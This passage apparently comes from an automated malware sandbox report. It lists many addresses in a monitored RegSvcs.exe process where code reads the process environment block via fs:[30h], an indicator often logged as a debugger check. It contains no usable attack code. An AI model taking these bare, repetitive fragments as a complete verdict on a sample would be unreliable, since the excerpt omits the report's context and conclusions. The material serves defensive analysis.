                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA2C3 mov eax, dword ptr fs:[00000030h]3_2_00FEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062349 mov eax, dword ptr fs:[00000030h]3_2_01062349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA352 mov eax, dword ptr fs:[00000030h]3_2_010AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01088350 mov ecx, dword ptr fs:[00000030h]3_2_01088350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov ecx, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106035C mov eax, dword ptr fs:[00000030h]3_2_0106035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02A0 mov eax, dword ptr fs:[00000030h]3_2_00FF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF02A0 mov eax, dword ptr fs:[00000030h]3_2_00FF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108437C mov eax, dword ptr fs:[00000030h]3_2_0108437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100438F mov eax, dword ptr fs:[00000030h]3_2_0100438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100438F mov eax, dword ptr fs:[00000030h]3_2_0100438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD826B mov eax, dword ptr fs:[00000030h]3_2_00FD826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4260 mov eax, dword ptr fs:[00000030h]3_2_00FE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6259 mov eax, dword ptr fs:[00000030h]3_2_00FE6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA250 mov eax, dword ptr fs:[00000030h]3_2_00FDA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109C3CD mov eax, dword ptr fs:[00000030h]3_2_0109C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD823B mov eax, dword ptr fs:[00000030h]3_2_00FD823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010663C0 mov eax, dword ptr fs:[00000030h]3_2_010663C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov ecx, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108E3DB mov eax, dword ptr fs:[00000030h]3_2_0108E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010843D4 mov eax, dword ptr fs:[00000030h]3_2_010843D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010843D4 mov eax, dword ptr fs:[00000030h]3_2_010843D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010163FF mov eax, dword ptr fs:[00000030h]3_2_010163FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F0 mov eax, dword ptr fs:[00000030h]3_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068243 mov eax, dword ptr fs:[00000030h]3_2_01068243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068243 mov ecx, dword ptr fs:[00000030h]3_2_01068243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A250 mov eax, dword ptr fs:[00000030h]3_2_0109A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A250 mov eax, dword ptr fs:[00000030h]3_2_0109A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E284 mov eax, dword ptr fs:[00000030h]3_2_0101E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E284 mov eax, dword ptr fs:[00000030h]3_2_0101E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov ecx, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC310 mov ecx, dword ptr fs:[00000030h]3_2_00FDC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076500 mov eax, dword ptr fs:[00000030h]3_2_01076500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE04E5 mov ecx, dword ptr fs:[00000030h]3_2_00FE04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AAB40 mov eax, dword ptr fs:[00000030h]3_2_010AAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01088B42 mov eax, dword ptr fs:[00000030h]3_2_01088B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EB50 mov eax, dword ptr fs:[00000030h]3_2_0108EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8AA0 mov eax, dword ptr fs:[00000030h]3_2_00FE8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8AA0 mov eax, dword ptr fs:[00000030h]3_2_00FE8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0A5B mov eax, dword ptr fs:[00000030h]3_2_00FF0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0A5B mov eax, dword ptr fs:[00000030h]3_2_00FF0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094BB0 mov eax, dword ptr fs:[00000030h]3_2_01094BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094BB0 mov eax, dword ptr fs:[00000030h]3_2_01094BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EBD0 mov eax, dword ptr fs:[00000030h]3_2_0108EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106CBF0 mov eax, dword ptr fs:[00000030h]3_2_0106CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EBFC mov eax, dword ptr fs:[00000030h]3_2_0100EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106CA11 mov eax, dword ptr fs:[00000030h]3_2_0106CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA24 mov eax, dword ptr fs:[00000030h]3_2_0101CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EA2E mov eax, dword ptr fs:[00000030h]3_2_0100EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01004A35 mov eax, dword ptr fs:[00000030h]3_2_01004A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01004A35 mov eax, dword ptr fs:[00000030h]3_2_01004A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA38 mov eax, dword ptr fs:[00000030h]3_2_0101CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0BBE mov eax, dword ptr fs:[00000030h]3_2_00FF0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0BBE mov eax, dword ptr fs:[00000030h]3_2_00FF0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EA60 mov eax, dword ptr fs:[00000030h]3_2_0108EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105CA72 mov eax, dword ptr fs:[00000030h]3_2_0105CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105CA72 mov eax, dword ptr fs:[00000030h]3_2_0105CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDCB7E mov eax, dword ptr fs:[00000030h]3_2_00FDCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4A80 mov eax, dword ptr fs:[00000030h]3_2_010B4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018A90 mov edx, dword ptr fs:[00000030h]3_2_01018A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036AA4 mov eax, dword ptr fs:[00000030h]3_2_01036AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014AD0 mov eax, dword ptr fs:[00000030h]3_2_01014AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014AD0 mov eax, dword ptr fs:[00000030h]3_2_01014AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101AAEE mov eax, dword ptr fs:[00000030h]3_2_0101AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101AAEE mov eax, dword ptr fs:[00000030h]3_2_0101AAEE
